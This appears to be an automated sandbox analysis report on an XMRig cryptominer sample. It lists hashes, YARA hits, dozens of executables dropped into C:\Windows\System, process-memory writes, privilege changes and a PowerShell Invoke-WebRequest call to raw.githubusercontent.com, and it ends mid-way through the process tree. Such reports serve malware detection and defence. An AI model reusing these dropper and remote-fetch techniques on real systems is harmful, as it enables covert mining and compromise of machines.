xmrig | f16aec5aa07c85f0ba21ff901a80e24608ac53a9772fe52a1705cabc798bf7d7

Analysis

max time kernel
25s
max time network
36s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
01-05-2024 02:58

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
Size

1.8MB
MD5

0af53e732cc193610e69548b616b7469
SHA1

f1a2136813df668551e1343da0d7d09835f942d9
SHA256

f16aec5aa07c85f0ba21ff901a80e24608ac53a9772fe52a1705cabc798bf7d7
SHA512

9893227f3583a421644fb6ece084c0a4c58d5c30ca78fb254cd27e31f24cbbe206c38f85970fd85d0529ac55f97a2aaca7fe92c20e2d18350583455956cf7aad
SSDEEP

49152:Lz071uv4BPMkibTIA5sf6r+WVc2HhG82SflDrl8/:NABp

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 18 IoCs

miner

resource	yara_rule
behavioral2/memory/536-30-0x00007FF79F780000-0x00007FF79FB72000-memory.dmp	xmrig
behavioral2/memory/4876-99-0x00007FF679840000-0x00007FF679C32000-memory.dmp	xmrig
behavioral2/memory/1976-98-0x00007FF61D010000-0x00007FF61D402000-memory.dmp	xmrig
behavioral2/memory/3584-97-0x00007FF73DF00000-0x00007FF73E2F2000-memory.dmp	xmrig
behavioral2/memory/5008-94-0x00007FF6E3E60000-0x00007FF6E4252000-memory.dmp	xmrig
behavioral2/memory/3752-53-0x00007FF754AF0000-0x00007FF754EE2000-memory.dmp	xmrig
behavioral2/memory/3660-41-0x00007FF739C90000-0x00007FF73A082000-memory.dmp	xmrig
behavioral2/memory/3744-124-0x00007FF68A7D0000-0x00007FF68ABC2000-memory.dmp	xmrig
behavioral2/memory/5020-121-0x00007FF766C70000-0x00007FF767062000-memory.dmp	xmrig
behavioral2/memory/4580-146-0x00007FF63D300000-0x00007FF63D6F2000-memory.dmp	xmrig
behavioral2/memory/4508-252-0x00007FF750490000-0x00007FF750882000-memory.dmp	xmrig
behavioral2/memory/4744-10-0x00007FF7D9BC0000-0x00007FF7D9FB2000-memory.dmp	xmrig
behavioral2/memory/916-1739-0x00007FF676C00000-0x00007FF676FF2000-memory.dmp	xmrig
behavioral2/memory/1216-1724-0x00007FF782E90000-0x00007FF783282000-memory.dmp	xmrig
behavioral2/memory/3716-2169-0x00007FF742DE0000-0x00007FF7431D2000-memory.dmp	xmrig
behavioral2/memory/740-2165-0x00007FF759650000-0x00007FF759A42000-memory.dmp	xmrig
behavioral2/memory/3692-2549-0x00007FF6D3C20000-0x00007FF6D4012000-memory.dmp	xmrig
behavioral2/memory/4268-2546-0x00007FF61E3D0000-0x00007FF61E7C2000-memory.dmp	xmrig

Blocklisted process makes network request 7 IoCs

flow	pid	Process
3	2220	powershell.exe
5	2220	powershell.exe
9	2220	powershell.exe
10	2220	powershell.exe
13	2220	powershell.exe
14	2220	powershell.exe
16	2220	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
4744	zlSrukR.exe
3660	GVznBNt.exe
536	kPZFfxl.exe
916	lUQRMGe.exe
740	bBvgGIE.exe
3752	SsIKAVX.exe
3692	mpNMBSG.exe
5008	NgvWzDs.exe
3584	XhHKgjB.exe
3592	smLahny.exe
4268	VeOcnua.exe
3716	HrZMNNl.exe
1976	MhOmnBR.exe
4876	vaFdATj.exe
5020	NyZkFpy.exe
3744	snLOUGo.exe
732	cnaRgor.exe
4616	BfTWVzR.exe
2908	wONMgvI.exe
4580	WkGZBiH.exe
4508	jQofHzt.exe
1800	nHeBjBB.exe
4092	SdCNRnR.exe
1620	CqikONl.exe
2208	lSczPkb.exe
4980	YsSiHEs.exe
4852	tStLWeK.exe
832	sQLgrKy.exe
2420	CIXgIJP.exe
976	lZGcyyN.exe
1004	qANKVup.exe
100	injLmaK.exe
2720	ddiGHTn.exe
1960	MbsXdgX.exe
1676	XdOwCSj.exe
4916	CfXkxSy.exe
3712	eUyTVAV.exe
4680	KdSSkej.exe
2604	IgnKbSe.exe
4940	JPRPqEZ.exe
2112	JeVboHF.exe
4904	GROgugD.exe
736	uhpXhid.exe
3236	deUDBlf.exe
2996	JVOSUQA.exe
3608	IpVAXWY.exe
5052	CAgVNTl.exe
2096	EbhMXfe.exe
4804	SKWOLTh.exe
2480	lPfGFRq.exe
2172	unzEPAO.exe
3984	VfLDklg.exe
4328	XrujUTN.exe
4596	XStvogg.exe
3852	hlGrNUx.exe
2256	AgBBclG.exe
4796	ntBasbB.exe
1412	bWPZaJT.exe
2796	DsbHqhW.exe
4432	ICVNeFv.exe
2384	gWLLLvF.exe
2068	COnzYWG.exe
2580	PYEWjHA.exe
2584	zzgvYfP.exe

UPX packed file 61 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1216-0-0x00007FF782E90000-0x00007FF783282000-memory.dmp	upx
behavioral2/files/0x00090000000226f2-5.dat	upx
behavioral2/files/0x0008000000023435-9.dat	upx
behavioral2/files/0x0009000000023434-11.dat	upx
behavioral2/files/0x0007000000023437-29.dat	upx
behavioral2/memory/536-30-0x00007FF79F780000-0x00007FF79FB72000-memory.dmp	upx
behavioral2/files/0x000700000002343b-57.dat	upx
behavioral2/files/0x000700000002343e-83.dat	upx
behavioral2/memory/3692-93-0x00007FF6D3C20000-0x00007FF6D4012000-memory.dmp	upx
behavioral2/files/0x0007000000023442-95.dat	upx
behavioral2/memory/4876-99-0x00007FF679840000-0x00007FF679C32000-memory.dmp	upx
behavioral2/memory/1976-98-0x00007FF61D010000-0x00007FF61D402000-memory.dmp	upx
behavioral2/memory/3584-97-0x00007FF73DF00000-0x00007FF73E2F2000-memory.dmp	upx
behavioral2/memory/5008-94-0x00007FF6E3E60000-0x00007FF6E4252000-memory.dmp	upx
behavioral2/files/0x000700000002343f-90.dat	upx
behavioral2/memory/3716-87-0x00007FF742DE0000-0x00007FF7431D2000-memory.dmp	upx
behavioral2/files/0x000700000002343d-77.dat	upx
behavioral2/files/0x000700000002343c-76.dat	upx
behavioral2/memory/4268-71-0x00007FF61E3D0000-0x00007FF61E7C2000-memory.dmp	upx
behavioral2/files/0x000700000002343a-67.dat	upx
behavioral2/memory/3592-66-0x00007FF778040000-0x00007FF778432000-memory.dmp	upx
behavioral2/memory/3752-53-0x00007FF754AF0000-0x00007FF754EE2000-memory.dmp	upx
behavioral2/files/0x0007000000023438-45.dat	upx
behavioral2/files/0x0007000000023439-56.dat	upx
behavioral2/memory/740-43-0x00007FF759650000-0x00007FF759A42000-memory.dmp	upx
behavioral2/memory/3660-41-0x00007FF739C90000-0x00007FF73A082000-memory.dmp	upx
behavioral2/memory/916-35-0x00007FF676C00000-0x00007FF676FF2000-memory.dmp	upx
behavioral2/files/0x0007000000023436-34.dat	upx
behavioral2/files/0x0008000000023441-105.dat	upx
behavioral2/files/0x0008000000023440-118.dat	upx
behavioral2/memory/4616-122-0x00007FF77A7B0000-0x00007FF77ABA2000-memory.dmp	upx
behavioral2/memory/2908-123-0x00007FF6318D0000-0x00007FF631CC2000-memory.dmp	upx
behavioral2/memory/3744-124-0x00007FF68A7D0000-0x00007FF68ABC2000-memory.dmp	upx
behavioral2/files/0x0007000000023445-134.dat	upx
behavioral2/files/0x0007000000023444-132.dat	upx
behavioral2/memory/732-127-0x00007FF648DD0000-0x00007FF6491C2000-memory.dmp	upx
behavioral2/memory/5020-121-0x00007FF766C70000-0x00007FF767062000-memory.dmp	upx
behavioral2/files/0x0007000000023443-119.dat	upx
behavioral2/files/0x0009000000023422-112.dat	upx
behavioral2/files/0x0007000000023447-143.dat	upx
behavioral2/memory/4580-146-0x00007FF63D300000-0x00007FF63D6F2000-memory.dmp	upx
behavioral2/files/0x0007000000023448-154.dat	upx
behavioral2/files/0x000700000002344b-169.dat	upx
behavioral2/files/0x000700000002344d-173.dat	upx
behavioral2/files/0x0007000000023452-198.dat	upx
behavioral2/files/0x0007000000023450-194.dat	upx
behavioral2/files/0x0007000000023451-193.dat	upx
behavioral2/files/0x000700000002344f-189.dat	upx
behavioral2/files/0x000700000002344e-184.dat	upx
behavioral2/files/0x000700000002344c-174.dat	upx
behavioral2/memory/4508-252-0x00007FF750490000-0x00007FF750882000-memory.dmp	upx
behavioral2/files/0x000700000002344a-164.dat	upx
behavioral2/files/0x0007000000023449-159.dat	upx
behavioral2/files/0x0007000000023446-145.dat	upx
behavioral2/memory/4744-10-0x00007FF7D9BC0000-0x00007FF7D9FB2000-memory.dmp	upx
behavioral2/memory/916-1739-0x00007FF676C00000-0x00007FF676FF2000-memory.dmp	upx
behavioral2/memory/1216-1724-0x00007FF782E90000-0x00007FF783282000-memory.dmp	upx
behavioral2/memory/3716-2169-0x00007FF742DE0000-0x00007FF7431D2000-memory.dmp	upx
behavioral2/memory/740-2165-0x00007FF759650000-0x00007FF759A42000-memory.dmp	upx
behavioral2/memory/3692-2549-0x00007FF6D3C20000-0x00007FF6D4012000-memory.dmp	upx
behavioral2/memory/4268-2546-0x00007FF61E3D0000-0x00007FF61E7C2000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
3	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\XdOwCSj.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\SOKqOHt.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\NCFtEHK.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\kbKgWUt.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\wnIEfSL.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\YbdhNAb.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\iOzajxO.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\SBlNyaI.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\ELnAhwE.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\gXpomFy.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\aiyRdlR.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\HFHndic.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\pkhMlsr.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\RvORqXN.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\JVOSUQA.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\DacQKdw.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\mkiPisa.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\dXVweQk.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\tbsHICf.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\gJdfjDo.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\aaXfyHj.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\UxCAeTJ.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\Njqiqog.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\mpNMBSG.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\zUhCTHp.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\aWqqLDk.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\rmcgLqB.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\jmzoqvA.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\wbbNKLS.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\UJliDOQ.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\UjxoFdy.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\yTFvcnM.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\eGWoUxt.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\SxHDYYK.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\UZxtIQb.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\axOaklw.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\yevybUT.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\aAVEVjq.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\fDYLRyr.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\JmWtkkR.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\yZjNLAk.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\krWweef.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\cPWXDap.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\FSPJVjp.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\TqWgnAm.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\rbWsikj.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\KruWQqJ.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\kEvoFGe.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\MbzOEaQ.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\jAFkmDF.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\sUZPLRs.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\XXHrrLm.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\wdxHXRT.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\HGmqoVV.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\HwSKswM.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\VNLYHfu.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\xrnPUcc.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\tgDIuXk.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\LEncTUH.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\qSGsWRZ.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\mErWwCu.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\zWrmndD.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\nZoOPez.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
File created	C:\Windows\System\AHqqbci.exe	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2220	powershell.exe
2220	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
Token: SeLockMemoryPrivilege	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
Token: SeDebugPrivilege	2220	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1216 wrote to memory of 2220	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	82
PID 1216 wrote to memory of 2220	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	82
PID 1216 wrote to memory of 4744	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	83
PID 1216 wrote to memory of 4744	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	83
PID 1216 wrote to memory of 3660	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	84
PID 1216 wrote to memory of 3660	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	84
PID 1216 wrote to memory of 536	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	85
PID 1216 wrote to memory of 536	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	85
PID 1216 wrote to memory of 916	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	86
PID 1216 wrote to memory of 916	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	86
PID 1216 wrote to memory of 740	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	87
PID 1216 wrote to memory of 740	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	87
PID 1216 wrote to memory of 3752	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	88
PID 1216 wrote to memory of 3752	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	88
PID 1216 wrote to memory of 3692	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	89
PID 1216 wrote to memory of 3692	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	89
PID 1216 wrote to memory of 5008	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	90
PID 1216 wrote to memory of 5008	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	90
PID 1216 wrote to memory of 3584	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	91
PID 1216 wrote to memory of 3584	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	91
PID 1216 wrote to memory of 3592	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	92
PID 1216 wrote to memory of 3592	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	92
PID 1216 wrote to memory of 4268	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	93
PID 1216 wrote to memory of 4268	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	93
PID 1216 wrote to memory of 3716	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	94
PID 1216 wrote to memory of 3716	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	94
PID 1216 wrote to memory of 1976	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	95
PID 1216 wrote to memory of 1976	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	95
PID 1216 wrote to memory of 4876	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	96
PID 1216 wrote to memory of 4876	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	96
PID 1216 wrote to memory of 5020	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	97
PID 1216 wrote to memory of 5020	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	97
PID 1216 wrote to memory of 3744	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	98
PID 1216 wrote to memory of 3744	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	98
PID 1216 wrote to memory of 732	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	99
PID 1216 wrote to memory of 732	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	99
PID 1216 wrote to memory of 4616	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	100
PID 1216 wrote to memory of 4616	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	100
PID 1216 wrote to memory of 2908	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	101
PID 1216 wrote to memory of 2908	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	101
PID 1216 wrote to memory of 4580	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	102
PID 1216 wrote to memory of 4580	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	102
PID 1216 wrote to memory of 4508	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	103
PID 1216 wrote to memory of 4508	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	103
PID 1216 wrote to memory of 1800	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	104
PID 1216 wrote to memory of 1800	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	104
PID 1216 wrote to memory of 4092	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	105
PID 1216 wrote to memory of 4092	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	105
PID 1216 wrote to memory of 1620	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	106
PID 1216 wrote to memory of 1620	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	106
PID 1216 wrote to memory of 2208	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	107
PID 1216 wrote to memory of 2208	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	107
PID 1216 wrote to memory of 4980	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	108
PID 1216 wrote to memory of 4980	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	108
PID 1216 wrote to memory of 4852	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	109
PID 1216 wrote to memory of 4852	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	109
PID 1216 wrote to memory of 832	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	110
PID 1216 wrote to memory of 832	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	110
PID 1216 wrote to memory of 2420	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	111
PID 1216 wrote to memory of 2420	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	111
PID 1216 wrote to memory of 976	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	112
PID 1216 wrote to memory of 976	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	112
PID 1216 wrote to memory of 1004	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	113
PID 1216 wrote to memory of 1004	1216	0af53e732cc193610e69548b616b7469_JaffaCakes118.exe	113

C:\Users\Admin\AppData\Local\Temp\0af53e732cc193610e69548b616b7469_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\0af53e732cc193610e69548b616b7469_JaffaCakes118.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1216
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2220
- C:\Windows\System\zlSrukR.exe
  C:\Windows\System\zlSrukR.exe
  2⤵
  - Executes dropped EXE
  PID:4744
- C:\Windows\System\GVznBNt.exe
  C:\Windows\System\GVznBNt.exe
  2⤵
  - Executes dropped EXE
  PID:3660
- C:\Windows\System\kPZFfxl.exe
  C:\Windows\System\kPZFfxl.exe
  2⤵
  - Executes dropped EXE
  PID:536
- C:\Windows\System\lUQRMGe.exe
  C:\Windows\System\lUQRMGe.exe
  2⤵
  - Executes dropped EXE
  PID:916
- C:\Windows\System\bBvgGIE.exe
  C:\Windows\System\bBvgGIE.exe
  2⤵
  - Executes dropped EXE
  PID:740
- C:\Windows\System\SsIKAVX.exe
  C:\Windows\System\SsIKAVX.exe
  2⤵
  - Executes dropped EXE
  PID:3752
- C:\Windows\System\mpNMBSG.exe
  C:\Windows\System\mpNMBSG.exe
  2⤵
  - Executes dropped EXE
  PID:3692
- C:\Windows\System\NgvWzDs.exe
  C:\Windows\System\NgvWzDs.exe
  2⤵
  - Executes dropped EXE
  PID:5008
- C:\Windows\System\XhHKgjB.exe
  C:\Windows\System\XhHKgjB.exe
  2⤵
  - Executes dropped EXE
  PID:3584
- C:\Windows\System\smLahny.exe
  C:\Windows\System\smLahny.exe
  2⤵
  - Executes dropped EXE
  PID:3592
- C:\Windows\System\VeOcnua.exe
  C:\Windows\System\VeOcnua.exe
  2⤵
  - Executes dropped EXE
  PID:4268
- C:\Windows\System\HrZMNNl.exe
  C:\Windows\System\HrZMNNl.exe
  2⤵
  - Executes dropped EXE
  PID:3716
- C:\Windows\System\MhOmnBR.exe
  C:\Windows\System\MhOmnBR.exe
  2⤵
  - Executes dropped EXE
  PID:1976
- C:\Windows\System\vaFdATj.exe
  C:\Windows\System\vaFdATj.exe
  2⤵
  - Executes dropped EXE
  PID:4876
- C:\Windows\System\NyZkFpy.exe
  C:\Windows\System\NyZkFpy.exe
  2⤵
  - Executes dropped EXE
  PID:5020
- C:\Windows\System\snLOUGo.exe
  C:\Windows\System\snLOUGo.exe
  2⤵
  - Executes dropped EXE
  PID:3744
- C:\Windows\System\cnaRgor.exe
  C:\Windows\System\cnaRgor.exe
  2⤵
  - Executes dropped EXE
  PID:732
- C:\Windows\System\BfTWVzR.exe
  C:\Windows\System\BfTWVzR.exe
  2⤵
  - Executes dropped EXE
  PID:4616
- C:\Windows\System\wONMgvI.exe
  C:\Windows\System\wONMgvI.exe
  2⤵
  - Executes dropped EXE
  PID:2908
- C:\Windows\System\WkGZBiH.exe
  C:\Windows\System\WkGZBiH.exe
  2⤵
  - Executes dropped EXE
  PID:4580
- C:\Windows\System\jQofHzt.exe
  C:\Windows\System\jQofHzt.exe
  2⤵
  - Executes dropped EXE
  PID:4508
- C:\Windows\System\nHeBjBB.exe
  C:\Windows\System\nHeBjBB.exe
  2⤵
  - Executes dropped EXE
  PID:1800
- C:\Windows\System\SdCNRnR.exe
  C:\Windows\System\SdCNRnR.exe
  2⤵
  - Executes dropped EXE
  PID:4092
- C:\Windows\System\CqikONl.exe
  C:\Windows\System\CqikONl.exe
  2⤵
  - Executes dropped EXE
  PID:1620
- C:\Windows\System\lSczPkb.exe
  C:\Windows\System\lSczPkb.exe
  2⤵
  - Executes dropped EXE
  PID:2208
- C:\Windows\System\YsSiHEs.exe
  C:\Windows\System\YsSiHEs.exe
  2⤵
  - Executes dropped EXE
  PID:4980
- C:\Windows\System\tStLWeK.exe
  C:\Windows\System\tStLWeK.exe
  2⤵
  - Executes dropped EXE
  PID:4852
- C:\Windows\System\sQLgrKy.exe
  C:\Windows\System\sQLgrKy.exe
  2⤵
  - Executes dropped EXE
  PID:832
- C:\Windows\System\CIXgIJP.exe
  C:\Windows\System\CIXgIJP.exe
  2⤵
  - Executes dropped EXE
  PID:2420
- C:\Windows\System\lZGcyyN.exe
  C:\Windows\System\lZGcyyN.exe
  2⤵
  - Executes dropped EXE
  PID:976
- C:\Windows\System\qANKVup.exe
  C:\Windows\System\qANKVup.exe
  2⤵
  - Executes dropped EXE
  PID:1004
- C:\Windows\System\injLmaK.exe
  C:\Windows\System\injLmaK.exe
  2⤵
  - Executes dropped EXE
  PID:100
- C:\Windows\System\ddiGHTn.exe
  C:\Windows\System\ddiGHTn.exe
  2⤵
  - Executes dropped EXE
  PID:2720
- C:\Windows\System\MbsXdgX.exe
  C:\Windows\System\MbsXdgX.exe
  2⤵
  - Executes dropped EXE
  PID:1960
- C:\Windows\System\XdOwCSj.exe
  C:\Windows\System\XdOwCSj.exe
  2⤵
  - Executes dropped EXE
  PID:1676
- C:\Windows\System\CfXkxSy.exe
  C:\Windows\System\CfXkxSy.exe
  2⤵
  - Executes dropped EXE
  PID:4916
- C:\Windows\System\eUyTVAV.exe
  C:\Windows\System\eUyTVAV.exe
  2⤵
  - Executes dropped EXE
  PID:3712
- C:\Windows\System\KdSSkej.exe
  C:\Windows\System\KdSSkej.exe
  2⤵
  - Executes dropped EXE
  PID:4680
- C:\Windows\System\IgnKbSe.exe
  C:\Windows\System\IgnKbSe.exe
  2⤵
  - Executes dropped EXE
  PID:2604
- C:\Windows\System\JPRPqEZ.exe
  C:\Windows\System\JPRPqEZ.exe
  2⤵
  - Executes dropped EXE
  PID:4940
- C:\Windows\System\JeVboHF.exe
  C:\Windows\System\JeVboHF.exe
  2⤵
  - Executes dropped EXE
  PID:2112
- C:\Windows\System\GROgugD.exe
  C:\Windows\System\GROgugD.exe
  2⤵
  - Executes dropped EXE
  PID:4904
- C:\Windows\System\uhpXhid.exe
  C:\Windows\System\uhpXhid.exe
  2⤵
  - Executes dropped EXE
  PID:736
- C:\Windows\System\deUDBlf.exe
  C:\Windows\System\deUDBlf.exe
  2⤵
  - Executes dropped EXE
  PID:3236
- C:\Windows\System\JVOSUQA.exe
  C:\Windows\System\JVOSUQA.exe
  2⤵
  - Executes dropped EXE
  PID:2996
- C:\Windows\System\IpVAXWY.exe
